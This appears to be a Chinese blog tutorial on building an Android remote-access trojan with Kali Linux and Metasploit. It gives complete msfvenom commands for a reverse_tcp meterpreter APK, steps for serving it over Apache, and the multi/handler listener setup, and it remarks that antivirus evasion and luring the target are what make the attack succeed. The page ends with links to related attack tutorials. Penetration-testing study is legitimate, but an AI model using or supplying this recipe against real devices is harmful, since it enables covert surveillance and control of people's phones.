kali_msf6_渗透

简介: kali_msf6_渗透

工具简介:

msf全称Metasploit是H.D. Moore在2003年开发的,它是少数几个可用于执行诸多渗透测试步骤的工具。在发现新漏洞时(这是很常见的),Metasploit会监控Rapid7,然后Metasploit的200,000多个用户会将漏洞添加到Metasploit的目录上。然后,任何人只要使用Metasploit,就可以用它来测试特定系统的是否有这个漏洞。


通俗来说msf就是一个渗透的工具包,初学者可以从kali开始了解,因为kali的工具含量对于初学者来讲,还是比较广的,给我们去了解渗透工作,足够。


作者环境:

kali2020:版本没啥说的,至少用跟你现在电脑兼容的吧,下载链接已奉上


image.png


Get Kali | Kali Linux

局域网:kali的网卡与主机网卡要共享,并且主机与目标机在同一个局域网内

下面开始操作:

生成监听木马

image.png

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=5000 R > test.apk
             #       msf的模块                    kali的ip       kali的端口      生成文件

注意我们代码此时的路径在/home/lqx/桌面,这样我们生成的文件可以在桌面直接看到

将木马下载到手机

通过kali的apache服务将文件上传至服务器,而手机则通过kali的ip地址登陆服务器并下载木马。

image.png

/etc/init.d/apache2 start #开启apache服务

将刚刚生成的文件移动到/etc/www/html目录下,并删除此路径下的index.html文件

image.png

mv test.apk /var/www/html
#将test.apk文件移动到/var/www/html路径下
cd /var/www/html
#切换窗口的操作路径
rm index.html
#删除index.html文件

我们在浏览器输入kali的ip地址并下载测试用的木马文件

image.png

image.png

因为没有做防杀,所以立刻就被系统检测,不用担心我们“继续安装”。

image.png

安装完成后,我们直接运行它。因为生成的是纯木马文件没有任何伪装,运行了也不会有‘任何效果’

开启msf

image.png


image.png

msfconsole  #开启msf

配置参数

image.png

成功建立会话后进入meterpreter

use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.5.100    #kali的ip
set LPORT 5000           #kali的端口
#与前面配置木马时的host、port参数一致
run
#开始监听

测试渗透结果:

其实到这里我们就已经成功了,接下里我们可以在kali上对手机进行,拍照,查看app,等不可描述的操作,究其原理就是木马够接地气不被杀毒软件检测,其次诱导目标运行。

app_list #查看手机安装的app

image.png

相关文章
|
1月前
|
Java 网络安全 Windows
Kali渗透测试:使用 Armitage生成被控端和主控端
Kali渗透测试:使用 Armitage生成被控端和主控端
|
1月前
|
存储 Linux 网络安全
Kali 渗透测试:Meterpreter在Windows系统下的使用
Kali 渗透测试:Meterpreter在Windows系统下的使用
|
1月前
|
安全 网络协议 Linux
Kali渗透测试:使用Armitage针对漏洞进行攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击
|
1月前
|
安全 Linux 网络安全
Kali渗透测试:使用browser_autopwn2模块进行渗透攻击
Kali渗透测试:使用browser_autopwn2模块进行渗透攻击
|
1月前
|
安全 Linux Shell
Kali渗透测试-远程控制:6200端口变成“后门”
Kali渗透测试-远程控制:6200端口变成“后门”
|
1月前
|
安全 Linux 网络安全
Kali渗透测试:使用工具Metasploit攻击操作系统(二)
Kali渗透测试:使用工具Metasploit攻击操作系统(二)
|
前端开发 Linux 网络安全
kali linux 网络渗透测试学习笔记(一)Nmap工具进行端口扫描
一.利用Nmap扫描网站服务器的端口开放情况首先打开我们的kali linux才做系统,再打开其命令行模式,输入:nmap www.csdn.net 如下图所示:   因此,通过这个结果可以表明csdn上的端口开放了80端口以及443端口吗,这两个端口都十分重要,因为80端口适用于给用户呈现出数据,给用户看网站用的,443端口也是一个比较重要的端口。
2333 0
|
网络协议 Linux 网络安全
Kali Linux中的ARP欺骗攻击如何进行
Kali Linux中的ARP欺骗攻击如何进行
381 0
|
安全 Ubuntu 关系型数据库
Metasploit -- 攻击Metasploitable2靶机
Metasploit -- 攻击Metasploitable2靶机
528 0
Metasploit -- 攻击Metasploitable2靶机
|
安全 Shell Linux
实战-使用msf渗透攻击win7主机并远程执行命令
实战-使用msf渗透攻击win7主机并远程执行命令
实战-使用msf渗透攻击win7主机并远程执行命令